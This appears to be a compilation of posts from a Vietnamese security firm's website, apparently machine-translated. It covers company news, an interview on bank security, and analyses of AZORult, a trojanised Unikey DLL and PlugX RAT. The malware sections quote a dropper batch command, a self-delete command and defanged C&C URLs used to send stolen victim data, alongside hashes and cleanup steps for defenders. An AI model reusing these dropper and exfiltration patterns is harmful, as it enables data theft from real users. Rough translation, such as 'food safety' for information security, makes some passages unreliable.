Recently, CMC Cyber Security has just implemented security assessment, product quality testing, ensure the safety of Finhay's technology products from cyber attacks.
Industrial Revolution 4.0 has been happening at a fast speed, creating obvious changes in the fields of banking, investment - accumulation. This change has led to a change in the governance model, management structure, and products and services in banks, while strengthening risk management, ensuring network security and information protection. information of customers.
Before that fact, CMC Cyber Security has consulted and supported security testing for products on Finhay's website and applications on mobile device platforms. Specifically, CMC CS experts have evaluated the level of information security by testing penetration of technology products in order to find vulnerabilities and advise solutions to their partners. In addition, CMC also advised Finhay on solutions for monitoring, early warning, controlling the disclosure of sensitive data to the Internet, thereby continuously improving internal data defense and protection plans. better.
Through this cooperation, CMC Cyber Security helps users of Finhay high-tech products feel secure in transactions without worrying about their financial risks in cyberspace. Since then, supporting Finhay to provide reliable products, which are certified as safe products from a cyberattack for investors to make more profits.
Finhay is the leading smart application in Vietnam for small and medium investment - accumulation. With diversified and innovative personal finance products on digital platforms, financial transparency and a strong technology platform, Finhay helps users flexibly accumulate and invest from small sources of capital to create property and future protection.
CMC Cyber Security is a member company of CMC Group - Top 2 technology corporation in Vietnam. CMC Cyber Security is proud to be built from a team of qualified experts with many international degrees with the goal of becoming a strategic unit of the Group in the field of research and development of software and services. safety information.
We provide personal anti-virus products and services to assess, monitor security of information, build SOC, consult information security solutions for organizations / enterprises. The company always wants to bring to customers, individuals, businesses and organizations in all fields, truly effective security solutions with reasonable prices and the most professional service quality.
Recently, CMC Cyber Security Company has just added an Offensive Security Certified Professional - OSCP engineer. This is one of the most prestigious information security assessment certificates in the world.
OSCP is a certification program that focuses on security testing and attack skills. It consists of 2 parts: a 24-hour pentest test. Test results must then be written into a report in English, assessed within 7 days before the results are officially released.
The OSCP certification is in the top 5 of desirable penetration and testing certificates for security professionals and is one of the more demanding practice exams. At the exam, engineers must demonstrate the ability to research the network system, detect security gaps or weaknesses in the application system, thereby helping experts assess the level of risk as well as build building response and troubleshooting methods. It can be said that the most important assessment in the exam is sharp thinking and execution skills under great pressure.
Mr. Ha The Phuong - Deputy General Director of CMC Cyber Security Company said: “In order to provide security assessment services of international standards, the company always focuses on enhancing the level and capacity of engineers. At the same time, CMC Cyber Security also always encourages and supports engineers to participate in competitions to gain the world's most prestigious and valuable certificates ".
CMC Cyber Security is a unit with more than 10 years of experience in providing professional information security assessment services with many projects for large customers, the company's engineers achieve OSCP certification. practical complement to the quality of critical information systems assessment at both the national and international level.
This is also the clearest proof of the capacity and qualifications of the team of information security engineers of CMC Cyber Security, helping customers feel more secure about the quality of information security assessment services that the company is doing. provided.
Recently, CMC Cyber Security Company has just added an Offensive Security Certified Professional - OSCP engineer. This is one of the most prestigious information security assessment certificates in the world.
On the morning of July 3, 2020, representatives of CMC Cyber Security Company attended the Launching Ceremony of "Platform providing service center for safety, network security (SOC) to meet the requirements of connecting and sharing information. Information "at the headquarters of the Ministry of Information and Communication (TT&TT)
The event was attended by Deputy Minister of Information and Communications Nguyen Thanh Hung and representatives of units under the Ministry, the unit in charge of Information Technology (IT), Information Security (Security) of the ministries and agencies. ministries and 63 Departments of Information and Communications across the country.
At the event, CMC Cyber Security Company was recognized as a unit with SOC service meeting technical and human standards standards to ensure the safety of the information system of ministries, departments, and local units. At the same time, meeting the requirements of connecting and sharing information about the National Cyber Security Monitoring Center in the spirit of Directive 14 / CT-TTg and Official Dispatch No. 1552-BTTTT-CATTT.
Speaking at the ceremony, Deputy Minister of Information and Communications Nguyen Thanh Hung said, the criteria for choosing the platform include: good quality, can be provided as a service and does not require agencies or organizations. There must be a specialized force in information technology and network information security that can be deployed or immediately deployed.
8 enterprises providing SOC service platforms to meet the requirements of connecting and sharing information with the National Cyber Security Monitoring Center under the Department of Information and Communication, the Ministry of Information and Communications, including CMC Cyber Security Company, Viettel Cyber Security , VNPT, BKAV, FPT, Cyradar, VNCS Global and SAVIS.
This is an opportunity for businesses providing security services to access, listen and learn about the needs and conditions of the Information and Communication Services. On that basis, businesses can better meet the deployment of SOC systems as well as expand the market.
The establishment of the SOC platform not only contributes to ensuring network safety and security for the national digital transition in accordance with the direction of the Prime Minister, but also helps ministries, branches and localities to shorten 90% volume and time of implementing the "4-layer" model; Helping Vietnamese businesses promote investment in advanced technology and solutions, proceed to owning and forming an ecosystem of "Made in Vietnam" security products.
At the same time, the launching ceremony marked an important step, affirming that Vietnamese enterprises have sufficient research and development capabilities and are ready to provide network safety and security services for the domestic market. can reach the world.
Some pictures at the ceremony:
Taking advantage of the plague of the Covid-19 epidemic, hackers have attacked the need to capture information from people around the world to spread malware. The attacker tricked the user into downloading and running a malware whose interface was downloaded from a legitimate source but ran in the background.
The malware was identified as AZORult, a malware discovered in 2016, that collects web browser data such as cookies, browsing history, user id, passwords and even encryption keys.
File Type: Portable Executable 32
File Info: Microsoft Visual C ++ 8, Autoit
The attacker will trick the user into downloading a file called "Corona-virus-Map.com.exe". This file is written in Autoit so we can easily decompile and get the source code of the malicious code.
The script shows that it will create a folder at "%APPDATA% / Z11062600" and install two files, "Corona.exe", "Corona-virus-Map.com.exe" and then launch the two files.
File Type: Portable Executable 32
File Info: Microsoft Visual Studio .NET
The file "Corona-virus-Map.com.exe" is dropped onto the user's computer as a .Net file, through decompression and analysis. The main function of this file is to retrieve data from "hxxps: // gisanddata [.] Maps.arcgis [.] Com / apps / opsdashboard / index [.] Html# / bda7594740fd40299423467b48e9ecf6" to display to the user interface map of Covid-19 infection to gain trust that users do not suspect.
File Type: Portable Executable 32
File Info: Rar archive
File "Corona.exe" when launched will create two files, one is Corona.bat, the other is Corona.sfx.exe. In particular, the bat file has the following content:
Corona.sfx.exe -p3D2oetdNuZUqQHPJmcMDDHYoqkyNVsFk9r -dC: \ Windows \ System32
The process of "Corona.exe" file will use cmd to run the file "Corona.bat" and from there launch "Corona.sfx.exe". This "Corona.sfx.exe" file will create and run another Corona.exe file that has the same function as the first Corona.exe file to create and launch the next two files, bin.exe and Build.exe in folder "%APPDATA% / Z58538177". To make it easier to imagine, we have the process graph as follows:
File Type: Portable Executable 32
File Info: Borland Delphi
This is the main executable file of the malicious code. Identified by security vendors as AZORult, a type of malware that steals data. Once on the computer, the malware victim will get all the identification information such as Guid, version information, username, computername and create a separate guid:
From the guid just created, the malware is used to mutex to prevent two malware programs from running at the same time.
The malware re-encodes the identity information and immediately decrypts the C&C address
The malicious code connects to the C&C server along with the identity information of the victim machine and the server returns large amounts of data
After the malicious code decodes the downloaded data, we can see that they download a list of dynamic libraries to the victim machine and write to the folder "%TEMPda"
The malware lists a lengthy list of links from which we can determine where the malicious code is targeted. They hijack the data of browsers such as Firefox, Chrome, Chronium, Brave, Edge, Comodo, Kometa, Cococ, Opera, 360, ... email clients such as Outlook, Thunderbird, ... and many more. The libraries are downloaded to provide the necessary functions so that an attacker can read the data.
For example, malware will query Outlook profile data in the registry
Or steal the password to access the firezilla server
Even the victim's virtual currency is touched
Finally, the malware sends the captured data and encrypts them and sends them back to the C&C server. Malware runs the command to delete files.
C: \\ Windows \\ system32 \\ timeout.exe 3 & del \ ”bin.exe \
Hash: F6A5E02F46D761D3890DEBD8F2084D37 File Type: Portable Executable 32 File Info: UPX v3.0, Autoit
There are many tools that can help you unpack UPX such as CFF Explorer. This file, when executed, will make a copy to the folder "%APPDATA% / amd64_netfx4-system.runti..dowsruntime.ui.xaml.Globalization.Fontgroups.exe" and run. Just like the first dropper of malicious code, we only need to decompile the Autoit file to get the source code
We save a lot of time when this malicious code sample is not obfuscated too complicated. Through the process of analyzing and searching information, we can conclude that the main activity of the sample is to steal information from browser cookies, steal encryption keys, disable proxy configuration, change properties of file for anonymity.
- MD5: 73da2c02c6f8bfd4662dc84820dcd983
- MD5: 07b819b4d602635365e361b96749ac3e
- MD5: 1beba1640f5573cbac5552ae02c38f33
- MD5: c4852ee6589252c601bc2922a35dd7da
- MD5: F6A5E02F46D761D3890DEBD8F2084D37
- MD5: e9dcbecca02b600ce135f7d58b8cd830
- MD5: 3cb9fc1ee05f49438455ba1aea3bca4e
- coronavirusstatus [.] space
- Find the above md5 files in directories:
- %APPDATA% / Z11062600
- %APPDATA% / Z58538177
- %APPDATA% / amd64_netfx4-system.runti..dowsruntime.ui.xaml
- End all processes of the above files (if any)
- Delete all files above (if any and if the hash code is correct)
- Delete task scheduler link to file Windows.Globalization.Fontgroups.exe> Also can use software of trusted antivirus vendors to handle
The severity of the Covid-19 epidemic is undisputed. Bad guys are taking full advantage of the coronavirus-related information on the web and many may become prey to attacks. Users need to calmly protect themselves against biological viruses and computer viruses. > For a safe translation situation map, users should visit the website https://coronavirus.jhu.edu/map.html of Johns Hopkins University
In recent years, a series of cyber attacks against banks and financial institutions in Vietnam has occurred and tends to increase more strongly. Most recently, on November 21, information of about 2 million bank customers in Vietnam was shared for free on an international forum for hackers specializing in data sharing.
In sharing at the Forum of cybersecurity, information security 2019 that was just held yesterday, November 27 in Ho Chi Minh City, experts said that cyberattack attacks The critical information infrastructure of economic and financial organizations and groups continues to be complicated with increasingly complex and dangerous nature and levels. According to Deputy Director of Information Security Department (Ministry of Information and Communications) Nguyen Trong Duong, the bank is one of the regular targets of cybercriminals.
In order to further clarify the situation of information security (ATTT) of units and businesses operating in the fields of banking, finance, ICTnews newspaper had a talk with Mr. Ha The Phuong, Deputy General Director Director of CMC Cyber Security.
Mr. Ha The Phuong, Deputy General Director of CMC Cyber Security.
From the fact supporting agencies, units, businesses last time, How do you evaluate about investment as well as awareness, ncapacity to ensure food safety of the banks, financial institutions?
In the context that the domestic security market is still new and Vietnam still has few policies and standards to ensure the security of the industry, banks and large financial institutions thanks to the opportunity to integrate into the international market earlier, invest to ensure the safety of its system in accordance with international standards.
However, the investment will be very different for each bank: having a long-term investment bank and building its own team of security experts, and a bank that chooses to outsource security services. ATTT, some banks only use foreign solutions and are rated in the top of the world ... But in general, banks and large financial units all have stronger and more realistic views and investments about ensuring Security.
However, the reality shows that investing in good technologies is only a part of the organization's task of ensuring information security, in addition, there are still many internal tasks that banks must perform such as: monitoring , there are appropriate troubleshooting options, internal risk management options, there is a coordination process between many departments, regular drills to train the team as well as try the process ...
What do you think of it comments for that service cyber attack large as the the attack exposed user information banks, service providers main is the "wake up call" to The business is more interested in ATTT?
Any loss of security will bring damage to the organization, small will disrupt the operation of a certain component, greater than affecting the organization's customers or the reputation of the organization. These incidents are always good examples to advise organizations who are more concerned about securing information security for their systems.
I think that the units and businesses should not be ashamed and hide the incidents of information security. These incidents need to be thoroughly analyzed and devised a solution to root the problem so that it will not occur next time.
Leadership of CMCg reflect the problem loss of ATTT hot after only 2 weeks is forgotten and many units are ignored job safety assurance systems. Has this situation been improved yet, sir?
Up to now, although the above situation has improved, it still exists in many businesses. As I shared above, this is a matter of thinking and responsibilities of the head. If the head of the organization or business does not care about the security, do not invest enough for security, the technical personnel below will not be able to defend against attacks by hackers.
In fact, when a security loss incident occurs, many business owners often attribute immediately to the IT department or the department in charge of Information Security, rather than re-evaluate the organization that they are interested in protecting. Is it safe? Is there sufficient investment in ensuring security?
Deputy General Director of CMC Cyber Security said that limitations on IT resources and information security can always be solved by outsourced services (Photo of CMC SOC).
So in order to prevent and timely handle possible network attacks, what should banks and financial institutions pay attention to?
In my opinion now the problem is no longer what solution or technology is used to defend anymore, there have been many new and good solutions, advice and technology of both Vietnam and the world. The important thing now is to change the awareness of the leadership class, who must take the security of information into their responsibility, to take proper care and invest in information security.
One of the solutions that I think should be done is the responsibility of information security incidents to the heads of agencies, organizations and organizations; rather than pushing this too big responsibility to the information security or IT department.
According to the results survey of the Department of Information and Communications, 2 major obstacle factor Best for security assurance of nnear the goods was: Employees often violate information security and privacy policies and limited IT human resources, ATTT. Please tell us what banks need to do to overcome these trouble this?
Training, communicating security awareness, conducting security incident handling and monitoring 24/7 are the measures that the organization can apply to improve the situation of users' security policy violations. Training and drills need to be done regularly, considering this is an internal communication task that organizations need to do, rather than just doing and having enough regulations.
Limited IT resources and security can always be solved with outsourced services. Domestic businesses should trust and give opportunities for outsourced security assurance services provided by Vietnamese companies. Vietnam Community of Information Security always wants to enhance the quality of services, join hands to support domestic businesses to confront the increasingly dangerous and complex security risks today.
The CMD CMDD monitoring system detected malicious code that took advantage of Unikey software to attack Vietnamese users. Unikey is Vietnamese typing software for Windows very popular in Vietnam. Taking advantage of this, an attacker could create unikey installers using the official UnikeyNT.exe file but insert it in the same malicious directory. and use many techniques to trick users into running (exploit, phishing ...). Therefore users should only download the official version of unikey from the website unikey.org nor open strange files with strange paths. Also update the vulnerability patches for Windows.
In the case below, the file kbdus.dll (PE 32bit) containing malicious code has been inserted in the same directory as UnikeyNT.exe (version 4.0 RC2 Build 091101 NT). The attacker also changed the time attribute of the kbdus.dll file to the time of the UnikeyNT.exe file so that people could easily deceive the user. In fact, this file was compiled at the beginning of October 2019.
kbdus.dll is a library that will be loaded when the user uses the US keyboard layout (id 0x00000409). The attacker did an analysis of how Unikey works and realized when UnikeyNT.exe loaded the attached dll, UKhook40.dll, that would execute the LoadKeyboardLayoutA function to load the layout with id 0x00000409. Kbdus.dll will then load up. Because kbdus.dll is placed in the same directory as UnikeyNT.exe, this file will be loaded first, so it will execute malicious code contained in it.
At the DLL's DllMain function, the malicious code has created a new thread to execute its malicious behavior.
The malware created a mutex with the name "Global \ mFNXzY0g" to avoid overlapping execution. Malicious strings that are mostly used have been obfuscated with their own stackstring or encryption functions. The coding function here is simply set by adding the value of each character by 1 (for example, a hex "K" with a value of 0x4b will be encoded into 0x4c with the letter "L"). ). On ida pro you can use idapython to patch these characters. For stackstring, you can use ironstring.py's script flare-teamto simplify the analysis.
After creating and testing the mutex, the malicious code proceeds to read data from special registry keys. Most likely these keys are generated when the user executes an installation file prepared by the attacker. The first is the value "CB5JQLWSYQP2CWVRMJ8NB4CCUE1B8K4A" in the key "HKEY_CLASS_ROOT.kci \ PersistenHandler". This value will contain an envelope structure and xlm data. The information in the structure includes a number of values that the malware can check after decoding the data, such as the size of the xlm data before and after, the md5 data before and after it.
The decoded data is in xlm format, which will be maliciously read into a memory area via api in the xmllite.dll library.
The next value in the key "HKEY_CLASS_ROOT.kci \ PersistenHandler" is read as "F430D64D98E6EAC972380D568F080E08". It contains another data structure that also includes size and md5 information about the data in it. Based on this struct, the malicious code will decrypt to a different PE file with the decrypt method and check similar to the process of processing xml data.
This PE file is a dll named Knocker.dll and exported to the function named Construct, whose compile time is almost the same as the above kbdus.dll file. The malicious code loads the DLL into memory. Then the malicious code finds the address of the Construct function and executes it with the parameter is the address of the previously read data structure xml data.
Through APIs like VirtualAlloc, VirtualProtect, LoadLibrary, GetProcAddress, the PE file has been mapped to memory as a regular PE file. Before executing the Construct function, the malicious code also executes through the DllMain function in the dll to ensure the dll works properly.
Knocker.dll - Construct
At construct, the malicious code copies the data received from the parameter into another memory area, then begins collecting information about the user's computer. Information collected includes CPU, RAM, Windows information, computer name, organization, user information, language, timezone, network card, partition drive information and operating system installation.
The malware then generated a UUID in the key "HKEY_CLASS_ROOT.kci \ PersistenHandler". save 2 md5 values. The first value is generated from information about the user sid, username, and computer name. The second md5 information is based on cpu, ram, disk, network adapter values.
The malware continues to create a string to identify computers with the form "PC: %s; MAC: %s; SerVer: %f ”. This data will be in a struct that malicious code will encode in base64 form to send using GET method.
The request information sent to C&C has the form:
"Hxxp: //news.vnxahoi [.] Com: 443 / 4BwhFJ9p / job.php? [UUID] [data \ _in \ _base64]"
With user agent:
"Mozilla / 4.0 (compatible; MSIE 8.0; Win32)"
The enclosed header is:
"Content-Length: %d \ r \ nCache-Control: no-cache \ r \ nMD5: %s \ r \ nConnection: Close \ r \ n"
On the first connection, malicious code waits to receive a command to execute. And the second connection will be sent similar to the first with the purpose of reporting the execution of the command but using the POST and request methods to change with the format:
"Hxxp: //news.vnxahoi [.] Com: 443 / 4BwhFJ9p / job.php? [UUID] [create \ _process \ _sate]".
This is the final step in the execution of the malware. However, at the present time, the response is a 404 Not Found so the malicious code cannot continue to perform its other behaviors.
Information about c & c
Tested some information about the domain of c & c know the ip that this domain points to is 125 [.] 212.218.121.
Some other domains pointing to this ip are:
Assess the level of danger
This is an attack campaign that is well researched, very dangerous and hard to detect. Because unikey is a very popular text input method in Vietnam, it can be said that every Windows computer in Vietnam has Unikey installed. Attackers only need to drop the kbdus.dll file into the unikey folder to be able to exploit the victim's machine. It is recommended that users should carefully check the Unikey installation directory, remove the kbdus.dll file or use anti-malware products to protect their computers. CMDD of CMC has updated the malicious code kbdus.dll, users can download it at the following link: https://cmccybersecurity.com/cmc-antivirus-free/
This morning, at the office of Ministry of Information & Communications, representing CMC Cyber Security Company, General Director Ta Hoang Linh and Deputy General Director Ha The Phuong attended a press conference for the program "Information Security Vietnam 2019 ”will be held on the coming November 29.
Speaking at the press conference, Mr. Ta Hoang Linh, General Director of CMC Cyber Security said: “Currently, the role of information security is becoming increasingly important. CMC Cyber Security is a unit that recognizes the importance of information security field very early and is very patient to follow although this field is very wide and difficult.
From the perspective of a business, I think this is an opportunity for Vietnamese businesses to develop products and solutions suitable for a certain class in the field of information security. CMC Cyber Security will continue to invest more heavily in the team of experts and products so that we can contribute a part in the overall development of the field of information security and security. ”
Mr. Ta Hoang Linh, General Director of CMC Cyber Security spoke at the press conference.
The press conference also had the participation of Deputy Minister of Information and Communications Nguyen Thanh Hung, representatives of the leaders of the co-organizer of events such as the Department of Information Security (Ministry of Information and Communications), Department of Information and Communications (Ministry of Education and Training). ), Ministry of Justice 86 (Ministry of National Defense), Government Cipher Committee, Department A05 (Ministry of Public Security) and a number of businesses participated in the event and representatives of 30 press agencies.
Deputy Minister of Information and Communications Nguyen Thanh Hung, President of VNISA, said: This year's conference was attended by the Director of the Standardization Department of the International Telecommunications Union (ITU) to present views, orientations, recommendations and reviews. price of Vietnam food safety rating.
The Deputy Minister also emphasized that ensuring the security of information security is like paying attention to preventive medicine according to the motto "prevention is better than cure". In order to do this, awareness is very important, avoiding "the jump to the feet". Workshops - exhibitions and related events are organized to raise awareness, enhance training ... to ensure food safety. The word cognitive will have specific actions.
“Currently, Vietnam as well as many countries around the world accelerate the fourth industrial revolution and the digital transformation process. Therefore, the development of national capacity on cybersecurity and security is a prerequisite for building an e-government, building a digital economy, serving the activities of the state, businesses and people, " Mr. Vu Quoc Thanh, Vice Chairman and General Secretary of VNISA shared.
This year's conference was organized with the theme: "Enhancing Safety, National Cyber Security in a digital age"
Organized with the largest scale ever, this year's Vietnam Information Security Conference 2019 has a large, covering topic, expressing the aspirations of security workers '' Enhancing Safety, Network Security '' (Enhancing national cybersecurity in the digital era).
"This will be an important national forum, the most outstanding event on network safety and security in 2019 in Vietnam," Mr. Vu Quoc Thanh emphasized.
Information Security Day 2019 is the 12th annual event, chaired by the Vietnam Information Security Association (VNISA), in collaboration with the Department of Information Security (Ministry of Information and Communications) and Space Command. network (Ministry of Defense) organized, under the auspices of the Ministry of Information and Communications.
The seminar will focus on analyzing the vision and orientation of the government on enhancing network safety and security in Vietnam; policies, current situation, needs of application and development of information security technology (ATTT) and solutions to improve Vietnam's network safety and security rankings.
The Conference program consisted of a Plenary session in the morning and 02 Thematic sessions in the afternoon, with nearly 30 speeches and presentations from leaders of state management agencies in the field of network safety and security; managers, senior experts on security of large companies at home and abroad.
Mr. Ha The Phuong - Deputy General Director of CMC Cyber Security responded to the press PV on the current issues related to information security.
CMC Cyber Security's centralized malware prevention and monitoring system of CMC Cyber Security has discovered that a malicious code using PlugX RAT is attacking Vietnamese users, can get cookies from websites like Facebook, Gmail, Outlook ... even if the user has enabled 2-step authentication.
In a new warning message issued by CMC Cyber Security about a new line of malware using PlugX RAT that is attacking Vietnamese users, expert Bui Hong Son said, when users have logged into websites and information. The login status will be saved in the cookie. Through the checking process, for the Facebook page, these cookies can allow an attacker to steal the login session. In addition, the disclosure of cookies from other sites such as Gmail, Yahoo, and Outlook is also very dangerous, are all sensitive information that an attacker can exploit for malicious purposes.
PlugX is a malicious tool with many different versions used in many APT attacks around the world including attacks on Vietnam.
According to analysis by CMC Cyber Security expert Bui Hong Son, the implementation process of this malicious code on users' computers will go through stages: Exe files signed by large organizations are executed and loaded with. 1 modified malicious DLL; The DLL reads the associated payload file and executes shellcode in the payload; Shellcode will decode and extract the payload as a DLL, then execute the payload, the DLL will automatically install on the system via windows service or registry, run other sub-processes and inject code into the processes of windows; injected code processes execute PlugX functions.
After completing the installation and injecting code into other processes, the PlugX tool starts to execute its functions through receiving commands from C&C (control server - PV) or receiving direct commands. via backdoor (backdoor - PV).
C&C commands can include: Read, write file, directory, Keylogger; Get information about incoming network, get TCP, UDP connections; Port management; Manage user sessions such as lock screen, logoff, shutdown, restart; Get information about the process list and modules in the process, turn off the process;
Add, edit, delete, and query information in the registry, take screenshots; Retrieve information about installed services, change settings, status, and delete services; Execute SQL queries if SQL Server is detected on the victim computer; Create a backdoor that allows an attacker to directly or indirectly execute remote commands on the victim's computer.
Emphasizing that the APT attack is tightly organized, with a large investment in finance, technology and preparation, it is difficult for the security system to detect, CMC Cyber Security expert Bui Hong Son recommends that organizations organizations should have plans to prevent and combat APT attacks by measures such as deploying in-depth defense from network access points to end devices; Use technology, techniques, and system monitoring methods to detect early signs of attack; Use vulnerability and threat assessment services to limit attacks; Plan for incident response in advance to minimize damage when attacked.
In addition, organizations also need to pay attention to the training of information security awareness raising for officials and employees in the organization to help them ensure the safety of the network and the information they hold. Hold.
Towards the above preventive measures, CMC Cyber Security has now built a centralized monitoring and defense solution for endpoint devices (CMDD), SOC Center to monitor the system and provide guest services. price, security vulnerabilities review and a number of other support services to help organizations and agencies actively prevent APT attacks. Individual users can download antivirus software for free here.